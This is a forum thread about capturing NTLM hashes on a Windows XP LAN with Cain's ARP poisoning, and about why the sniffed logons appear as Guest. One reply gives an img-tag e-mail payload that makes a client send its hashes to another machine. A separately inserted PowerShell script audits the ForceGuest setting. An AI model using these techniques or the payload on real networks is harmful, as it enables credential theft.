-
Sniffing NTLM
I was wondering about what might be wrong here:
I was trying to get the NTLM hashes from another test computer in my switched LAN.
Started Cain ( www.oxid.it ), enabled ARP poison routing, and went to the other computer to log on to the computer running Cain. Then checked Cain: yes, it sniffed SMB actions. Imported the hashes to the cracker, but all the passwords were "empty". Noticed that these logons were logged as Guest. Darn.. So I changed the Guest account password and tried again. This time the logon attempts were Failed. And I got new hashes, but again the passwords were "empty".
The reason why I tried the above was that I have been told that Windows will try the logged-in user as a final attempt to access network shares on another computer..
Anyone who figures out what went wrong in my attempt? :)
-
It's the client that's sending the "empty" password.
-
Yes.. That's right, but is there any way I can force the client computer to send his password hashes? I have seen some options in sniffer programs where it is possible to "force cleartext password" etc. Is this what makes me get his password hashes?
-
What's the client's OS? What's the server's OS?
-
Both are using Microsoft Windows XP Home Edition.
-
By default Windows XP authenticates a network user as Guest. This can be the issue here. On Windows XP Pro you can change this from the Group Policy:
Computer Config > Windows settings > Security settings > Local policies > Security Options > Network access: Sharing and security model for local accounts
Not sure of this option on Home edition. Hope this helps.
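The policy named in that post is backed by a registry value, which matters because XP Home has no Group Policy editor. The script below is an added example (not from the thread); it audits that value on a standalone machine and, with the assumed -Fix switch, moves it off the "Guest only" model, which is what makes a sniffer see Guest logons instead of the real user's.

```powershell
# Added example (not from the thread): audit and correct the "Network access:
# Sharing and security model for local accounts" setting on a standalone
# (non-domain) machine. The policy is stored as the ForceGuest DWORD under
# HKLM\SYSTEM\CurrentControlSet\Control\Lsa: 1 = "Guest only", 0 = "Classic".
# Run from an elevated PowerShell prompt. -Fix is an assumed parameter name.
param([switch]$Fix)

$lsaPath = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$props   = Get-ItemProperty -Path $lsaPath

$forceGuest = $props.ForceGuest
if ($null -eq $forceGuest) {
    # Value absent: report it and leave it alone; the effective model then
    # depends on the Windows edition and build.
    Write-Output "ForceGuest is not set under $lsaPath"
} elseif ($forceGuest -eq 1) {
    Write-Output "ForceGuest = 1 (Guest only): remote logons to this machine are mapped to Guest,"
    Write-Output "so a sniffer on the wire sees Guest credentials, not the user's own account."
    if ($Fix) {
        Set-ItemProperty -Path $lsaPath -Name ForceGuest -Value 0 -Type DWord
        Write-Output "Set ForceGuest = 0 (Classic: local users authenticate as themselves)."
    }
} else {
    Write-Output "ForceGuest = $forceGuest (Classic): local users authenticate as themselves."
}

# Companion check: with the Classic model the Guest account should be disabled
# so failed logons cannot fall back to it. Get-LocalUser exists on Windows 10 /
# Server 2016 and later; on older systems the cmdlet is simply absent.
if (Get-Command Get-LocalUser -ErrorAction SilentlyContinue) {
    $guest = Get-LocalUser -Name Guest -ErrorAction SilentlyContinue
    if ($guest -and $guest.Enabled) {
        Write-Output "Guest account is ENABLED; consider: Disable-LocalUser -Name Guest"
    } else {
        Write-Output "Guest account is disabled (or absent)."
    }
}
```

The ForceGuest value is only consulted on machines that are not domain members; on a domain-joined host the setting has no effect.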
-
Your computer will send the NTLM password for authentication if you have a DHCP server in the network, otherwise as someone told it will be using your Guest account for shares.
For me with DHCP it works fine.
-
I've not seen any relation between network authentication and DHCP. Networks with static IP address also work with NTLM authentication.
-
To get a machine to send its LM and NTLM hashes send an html e-mail with the following in the document:
<img src=file://nbmachinename/null/gif height=1 width=1>
that will cause the client to send hashes for the current user (works on my network anywayz)
-
Wasn't this one of the vulnerabilities that was patched with the JPEG patch?
-
How would that work? Sending <img src=file://nbmachinename/null/gif height=1 width=1> in an HTML e-mail, it would have to go straight to the machine, wouldn't it? So how would you send that to a machine in a network?